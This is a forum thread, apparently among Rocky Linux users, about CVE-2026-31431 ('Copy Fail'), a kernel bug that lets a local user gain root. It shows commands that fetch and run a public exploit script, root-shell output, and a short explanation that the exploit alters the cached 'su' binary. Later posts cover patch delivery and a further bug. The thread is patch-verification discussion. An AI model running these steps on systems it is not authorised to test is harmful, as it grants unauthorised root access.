CVE-2026-31431 - Copy Fail - Linux kernel crypto vulnerability

I just deployed a new system using Rocky-9.7-x86_64-minimal.iso. After executing the commands below, regular users can still switch to root by running copy_fail_exp.py.

# yum install python3.11
# yum update -y
# reboot

# useradd testb
# echo "1" | passwd --stdin testb
# sudo su - testb
$ wget https://github.com/theori-io/copy-fail-CVE-2026-31431/blob/main/copy_fail_exp.py
$ python3.11 copy_fail_exp.py
Password:    # Enter password: 1
# id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

Sorry, but i don’t get it.

If the copy-fail script works, then there is no Password: prompt!
If there is a Password prompt, then the script failed to modify the page cache for su and so copy fail does not work.

yes.

the python script uses the bug to modify “su” (in cache) and finally runs “su”

a normal “su” will prompt for root password, the modified one will just give you a root shell.

Sorry, my mistake. The root password is the same as the regular user password; I was mistaken.

That’s the key point for me, you could have a situation where some complex bug only happens on Rocky and not on RHEL, or the other way round, and there’s also the issue of doing a clean removal of a Rocky specific patch to get it back to baseline.

Will this kernel be integrated into future releases so that users don’t need to update it manually? (Including versions 8, 9, and 10)

Here we go again, this time: Dirty Frag

The question of a separate “urgent security fix” repository just got even more interesting.

Here it goes: